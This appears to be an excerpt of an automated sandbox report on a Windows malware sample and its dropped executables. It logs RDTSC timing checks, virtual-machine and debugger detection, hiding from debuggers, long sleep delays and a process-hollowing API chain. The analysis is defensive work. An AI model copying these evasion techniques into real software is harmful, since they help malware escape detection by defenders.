                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49406AB second address: 49406DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FDAF1D5D9EEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDA80C026BDh 0x00000016 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49406DD second address: 49406E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49406E3 second address: 49406E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49406E7 second address: 4940707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDA80C00881h 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940707 second address: 494070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 494070B second address: 4940711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940711 second address: 494071A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, BC29h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 494071A second address: 4940735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDA80C00881h 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940735 second address: 4940759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDA80C026BCh 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940759 second address: 49407A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDA80C0087Bh 0x00000013 sbb ax, B71Eh 0x00000018 jmp 00007FDA80C00889h 0x0000001d popfd 0x0000001e call 00007FDA80C00880h 0x00000023 pop esi 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49407A9 second address: 49407D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FDA80C026C4h 0x0000000e mov dword ptr [esp], edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, ebx 0x00000016 mov dx, BABCh 0x0000001a popad 0x0000001b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49407D3 second address: 49407D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49407D9 second address: 49407FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDA80C026BAh 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49407FC second address: 4940802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940802 second address: 4940813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026BDh 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940813 second address: 494083A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA80C0087Dh 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 494083A second address: 4940841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940841 second address: 494086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov esi, 563CCE6Bh 0x0000000e mov edx, ecx 0x00000010 popad 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDA80C00889h 0x00000019 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49408E7 second address: 49408EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49408EB second address: 49408EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49408EF second address: 49408F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49408F5 second address: 4940947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007FDA80C00880h 0x00000010 mov dword ptr [ebp-04h], edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FDA80C0087Dh 0x0000001c add cx, 7B16h 0x00000021 jmp 00007FDA80C00881h 0x00000026 popfd 0x00000027 mov dh, al 0x00000029 popad 0x0000002a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940947 second address: 49409EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FDAF1D5D7E8h 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 pushad 0x00000014 mov si, bx 0x00000017 movsx edi, cx 0x0000001a popad 0x0000001b popad 0x0000001c mov ecx, dword ptr [esi+04h] 0x0000001f pushad 0x00000020 mov dx, ax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FDA80C026BBh 0x0000002a jmp 00007FDA80C026C3h 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 call 00007FDA80C026C4h 0x00000039 call 00007FDA80C026C2h 0x0000003e pop eax 0x0000003f pop edi 0x00000040 pushfd 0x00000041 jmp 00007FDA80C026C0h 0x00000046 jmp 00007FDA80C026C5h 0x0000004b popfd 0x0000004c popad 0x0000004d push eax 0x0000004e pushad 0x0000004f mov dl, 67h 0x00000051 push eax 0x00000052 push edx 0x00000053 mov edx, ecx 0x00000055 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49409EC second address: 4940A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebx 0x00000006 jmp 00007FDA80C00887h 0x0000000b lea ebx, dword ptr [esi+08h] 0x0000000e pushad 0x0000000f jmp 00007FDA80C00884h 0x00000014 jmp 00007FDA80C00882h 0x00000019 popad 0x0000001a mov edx, ebx 0x0000001c pushad 0x0000001d mov cx, di 0x00000020 popad 0x00000021 call 00007FDAF1D3362Bh 0x00000026 mov edi, edi 0x00000028 push ebp 0x00000029 mov ebp, esp 0x0000002b push ecx 0x0000002c push esi 0x0000002d mov esi, edx 0x0000002f push edi 0x00000030 cmp ecx, 00000107h 0x00000036 jbe 00007FDA80C0088Eh 0x00000038 sub ecx, 0000010Fh 0x0000003e je 00007FDA80C008A8h 0x00000040 sub ecx, 11h 0x00000043 je 00007FDA80C008A3h 0x00000045 sub ecx, 00000166h 0x0000004b je 00007FDA80C0089Bh 0x0000004d xor eax, eax 0x0000004f pop edi 0x00000050 inc eax 0x00000051 pop esi 0x00000052 leave 0x00000053 ret 0x00000054 pushad 0x00000055 mov dx, 4FD8h 0x00000059 pushad 0x0000005a mov dx, 2DA2h 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4940A4C second address: 4940A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test eax, eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FDA80C026C0h 0x00000010 mov bl, ah 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 4940A6A second address: 4940A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 4940A70 second address: 4940A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 4940A74 second address: 4940A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FDAF1D335E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ebx, 0897D2B2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 4940A8C second address: 4940A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 4940A91 second address: 4940B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [75AF4C30h] 0x0000000e pushad 0x0000000f mov dx, ax 0x00000012 pushfd 0x00000013 jmp 00007FDA80C0087Ah 0x00000018 adc ax, 3EF8h 0x0000001d jmp 00007FDA80C0087Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov edx, dword ptr [ebx] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FDA80C0087Bh 0x0000002f add si, 42BEh 0x00000034 jmp 00007FDA80C00889h 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007FDA80C00880h 0x00000040 and cl, FFFFFFB8h 0x00000043 jmp 00007FDA80C0087Bh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 4940B22 second address: 4940B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 4940B28 second address: 4940B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 4940B2C second address: 4940B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [eax], 00000002h 0x0000000b jmp 00007FDA80C026C7h 0x00000010 jne 00007FDAF1D5D62Ah 0x00000016 jmp 00007FDA80C026C6h 0x0000001b pop ebx 0x0000001c pushad 0x0000001d mov cl, 1Bh 0x0000001f mov ax, bx 0x00000022 popad 0x00000023 mov eax, edi 0x00000025 jmp 00007FDA80C026C5h 0x0000002a pop edi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FDA80C026BDh 0x00000032 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Special instruction interceptor: First address: 40BD57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Special instruction interceptor: First address: 5E15B7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Special instruction interceptor: First address: 5C8CAC instructions caused by: Self-modifying code
Source: C:\ProgramData\rcjuo\eafkou.exe | Special instruction interceptor: First address: 40BD57 instructions caused by: Self-modifying code
Source: C:\ProgramData\rcjuo\eafkou.exe | Special instruction interceptor: First address: 5E15B7 instructions caused by: Self-modifying code
Source: C:\ProgramData\rcjuo\eafkou.exe | Special instruction interceptor: First address: 5C8CAC instructions caused by: Self-modifying code
Source: C:\ProgramData\rcjuo\eafkou.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\ProgramData\rcjuo\eafkou.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\ProgramData\rcjuo\eafkou.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Code function: 4_2_04940C1E rdtsc 4_2_04940C1E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Window / User API: threadDelayed 1628
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Window / User API: threadDelayed 7987
Source: C:\ProgramData\rcjuo\eafkou.exe | Window / User API: threadDelayed 973
Source: C:\ProgramData\rcjuo\eafkou.exe | Window / User API: threadDelayed 1183
Source: C:\ProgramData\rcjuo\eafkou.exe | Window / User API: threadDelayed 888
Source: C:\ProgramData\rcjuo\eafkou.exe | Window / User API: threadDelayed 1418
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | API coverage: 4.2 %
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | API coverage: 1.9 %
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 6556 | Thread sleep count: 1628 > 30
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 6556 | Thread sleep time: -48840000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 320 | Thread sleep time: -720000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 4612 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 6556 | Thread sleep count: 7987 > 30
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 6556 | Thread sleep time: -239610000s >= -30000s
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe TID: 1472 | Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 6084 | Thread sleep time: -134067s >= -30000s
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 6524 | Thread sleep time: -1946973s >= -30000s
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 4676 | Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 5756 | Thread sleep time: -2367183s >= -30000s
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 572 | Thread sleep time: -1776888s >= -30000s
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 6608 | Thread sleep time: -2837418s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_000AF011 FindFirstFileExW, 0_2_000AF011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_0090F011 FindFirstFileExW, 1_2_0090F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_0090F011 FindFirstFileExW, 2_2_0090F011
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_000793D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo, 0_2_000793D0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Thread delayed: delay time: 60000
Source: C:\ProgramData\rcjuo\eafkou.exe | Thread delayed: delay time: 60000
Source: rundrive.exe, rundrive.exe, 00000004.00000002.2276703263.0000000000596000.00000040.00000001.01000000.0000000A.sdmp, eafkou.exe, eafkou.exe, 00000005.00000002.4538598446.0000000000596000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: XO4ioEY3nq.exe, 00000000.00000003.2077078897.0000000001434000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001424000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: eafkou.exe, 00000005.00000002.4539439463.00000000008B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: rundrive.exe, 00000004.00000002.2276703263.0000000000596000.00000040.00000001.01000000.0000000A.sdmp, eafkou.exe, 00000005.00000002.4538598446.0000000000596000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | System information queried: ModuleInformation
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Process information queried: ProcessInformation

Anti Debugging
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Thread information set: HideFromDebugger
Source: C:\ProgramData\rcjuo\eafkou.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Code function: 4_2_04940148 Start: 049401C9 End: 049401CF 4_2_04940148
Source: C:\ProgramData\rcjuo\eafkou.exe | Code function: 5_2_04950152 Start: 04950469 End: 049501C3 5_2_04950152
Source: C:\ProgramData\rcjuo\eafkou.exe | Open window title or class name: regmonclass
Source: C:\ProgramData\rcjuo\eafkou.exe | Open window title or class name: gbdyllo
Source: C:\ProgramData\rcjuo\eafkou.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\rcjuo\eafkou.exe | Open window title or class name: procmon_window_class
Source: C:\ProgramData\rcjuo\eafkou.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\rcjuo\eafkou.exe | Open window title or class name: ollydbg
Source: C:\ProgramData\rcjuo\eafkou.exe | Open window title or class name: filemonclass
Source: C:\ProgramData\rcjuo\eafkou.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\rcjuo\eafkou.exe | File opened: NTICE
Source: C:\ProgramData\rcjuo\eafkou.exe | File opened: SICE
Source: C:\ProgramData\rcjuo\eafkou.exe | File opened: SIWVID
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Process queried: DebugPort
Source: C:\ProgramData\rcjuo\eafkou.exe | Process queried: DebugPort
Source: C:\ProgramData\rcjuo\eafkou.exe | Process queried: DebugPort
Source: C:\ProgramData\rcjuo\eafkou.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Code function: 4_2_04940C1E rdtsc 4_2_04940C1E
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0009A245
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_000A6092 mov eax, dword ptr fs:[00000030h] 0_2_000A6092
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009DC00 mov eax, dword ptr fs:[00000030h] 0_2_0009DC00
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_00906092 mov eax, dword ptr fs:[00000030h] 1_2_00906092
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_008FDC00 mov eax, dword ptr fs:[00000030h] 1_2_008FDC00
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_00906092 mov eax, dword ptr fs:[00000030h] 2_2_00906092
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_008FDC00 mov eax, dword ptr fs:[00000030h] 2_2_008FDC00
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_000B0592 GetProcessHeap, 0_2_000B0592
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0009A245
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009A3A8 SetUnhandledExceptionFilter, 0_2_0009A3A8
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009EC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0009EC0D
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0009995A
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_008FA245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_008FA245
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_008FA3A8 SetUnhandledExceptionFilter, 1_2_008FA3A8
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_008FEC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_008FEC0D
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_008F995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_008F995A
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_008FA245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_008FA245
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_008FA3A8 SetUnhandledExceptionFilter, 2_2_008FA3A8
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_008FEC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_008FEC0D
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_008F995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_008F995A

HIPS / PFW / Operating System Protection Evasion
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_00078070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 0_2_00078070
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Process created: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe "C:\Users\user\AppData\Roaming\10000550100\rundrive.exe"
Source: rundrive.exe, rundrive.exe, 00000004.00000002.2276703263.0000000000596000.00000040.00000001.01000000.0000000A.sdmp, eafkou.exe, eafkou.exe, 00000005.00000002.4538598446.0000000000596000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: yProgram Manager
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009A42F cpuid 0_2_0009A42F
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: EnumSystemLocalesW, 0_2_000B2168
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: EnumSystemLocalesW, 0_2_000B21B3
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: EnumSystemLocalesW, 0_2_000B224E
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: EnumSystemLocalesW, 0_2_000A825C
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_000B22D9
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: GetLocaleInfoW, 0_2_000B252C
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_000B2652
